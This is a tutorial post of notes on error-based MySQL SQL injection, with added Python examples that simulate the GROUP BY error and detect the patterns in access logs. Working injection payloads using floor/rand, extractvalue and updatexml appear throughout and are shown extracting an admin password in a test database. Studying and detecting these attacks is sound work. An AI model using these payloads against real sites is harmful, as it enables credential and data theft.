Posting some of my old notes. When MySQL executes a statement it raises an error message, and PHP+MySQL sites often print that error text on the page, so specific data can be retrieved by constructing queries in the following three ways.
Test environment:
mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+

mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+

mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1. Error via floor()
The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)));
Example:
First run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error.

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

As you can see, the MySQL version is disclosed in the error message. To retrieve other data, replace the version() subexpression with the subquery you need.
For example, to get the administrator username and password:
Method 1:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
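Why the error text ends up carrying the selected value (and why a site must never echo database errors) is easier to see with a model of what GROUP BY does. The block below is an added example, not code from the original post: it re-implements the seeded generator behind MySQL's RAND() (the randominit()/my_rnd() routines, assumed unchanged across the 5.x line) and simulates the temporary-table lookup and insert that GROUP BY performs; no database is involved.

```python
# Added example: model of the floor(rand(0)*2) GROUP BY duplicate-key error.
MAX_VALUE = 0x3FFFFFFF  # modulus used by MySQL's my_rnd()

def mysql_rand(seed):
    """Generator reproducing the RAND(seed) sequence for an integer seed."""
    seed &= 0xFFFFFFFF
    seed1 = ((seed * 0x10001 + 55555555) & 0xFFFFFFFF) % MAX_VALUE
    seed2 = ((seed * 0x10000001) & 0xFFFFFFFF) % MAX_VALUE
    while True:
        seed1 = (seed1 * 3 + seed2) % MAX_VALUE
        seed2 = (seed1 + seed2 + 33) % MAX_VALUE
        yield seed1 / MAX_VALUE

def floor_rand_sequence(seed, n):
    """First n values of floor(rand(seed)*2); seed 0 gives 0,1,1,0,1,1,0,..."""
    rng = mysql_rand(seed)
    return [int(next(rng) * 2) for _ in range(n)]

def simulate_group_by(rows, prefix="5.1.33-community-log"):
    """Simulate GROUP BY concat(prefix, floor(rand(0)*2)) over `rows` rows.

    MySQL evaluates the group key once to look it up in the temporary table;
    if the group is new it evaluates the key AGAIN to insert it. rand(0)
    advances between the two evaluations, so the inserted key can differ
    from the looked-up one, and on the third row the insert collides with a
    key that already exists: that collision is ERROR 1062, and the key it
    names is the attacker-chosen prefix plus a digit.
    Returns ("ok", group_counts) or ("error", message).
    """
    rng = mysql_rand(0)
    table = {}
    for _ in range(rows):
        lookup_key = prefix + str(int(next(rng) * 2))
        if lookup_key in table:
            table[lookup_key] += 1
            continue
        insert_key = prefix + str(int(next(rng) * 2))  # second evaluation
        if insert_key in table:
            return ("error", f"Duplicate entry '{insert_key}' for key 'group_key'")
        table[insert_key] = 1
    return ("ok", table)

if __name__ == "__main__":
    print("floor(rand(0)*2):", floor_rand_sequence(0, 7))
    for n in (1, 2, 3):  # information_schema.tables has far more than 3 rows
        print(f"{n} row(s):", simulate_group_by(n))
```

With one or two rows the grouping succeeds; the error needs at least three, which is why the second payload form builds its own three-row derived table with `union`.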
2. ExtractValue
Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test run:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3. UpdateXml
Test statement:

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))

Actual test run:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
All, thanks foreign guys.
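For the detection side, here is an added example (not from the original post) that scans web-server access-log lines for the three techniques above: it URL-decodes each request target, collapses comment and whitespace obfuscation, and reports which technique is present. The log lines are constructed samples that reuse the payloads shown in this post, not real traffic.

```python
# Added example: access-log detector for the three error-based patterns.
import re
from urllib.parse import unquote_plus

# Each technique is a tuple of regexes that must ALL match the decoded request.
TECHNIQUES = {
    "floor-groupby": (r"floor\s*\(\s*rand\s*\(", r"group\s+by"),
    "extractvalue":  (r"extractvalue\s*\(",),
    "updatexml":     (r"updatexml\s*\(",),
}
REQUEST_LINE = re.compile(r'"(?:GET|POST)\s+(\S+)')

def normalise(raw):
    """URL-decode twice (double encoding) and collapse /**/ and whitespace."""
    text = unquote_plus(unquote_plus(raw))
    text = re.sub(r"/\*.*?\*/", " ", text)   # inline comments used as spaces
    return re.sub(r"\s+", " ", text).lower()

def classify_request(request_target):
    """Return the error-based techniques found in one URL/query string."""
    text = normalise(request_target)
    return [name for name, rxs in TECHNIQUES.items()
            if all(re.search(rx, text) for rx in rxs)]

def scan_log(lines):
    """Return [(line_number, techniques)] for every matching log line."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        found = classify_request(m.group(1))
        if found:
            hits.append((n, found))
    return hits

# Constructed sample access-log lines (payloads are the ones from the post).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2009:10:00:00 +0000] "GET /article.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2009:10:00:01 +0000] "GET /article.php?id=1%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 210',
    '10.0.0.5 - - [01/Jan/2009:10:00:02 +0000] "GET /article.php?id=1%20and%20extractvalue(1,concat(0x5c,(select%20pass%20from%20admin%20limit%201))) HTTP/1.1" 500 190',
    '10.0.0.5 - - [01/Jan/2009:10:00:03 +0000] "GET /article.php?id=1%20and%201=(updatexml(1,concat(0x5e24,(select%20user()),0x5e24),1)) HTTP/1.1" 500 188',
]

if __name__ == "__main__":
    for n, found in scan_log(SAMPLE_LOG):
        print(f"line {n}: {', '.join(found)}")
```

These are signatures and can be evaded with other encodings, so they complement, rather than replace, parameterised queries and a display_errors-off configuration that keeps MySQL error text off the page.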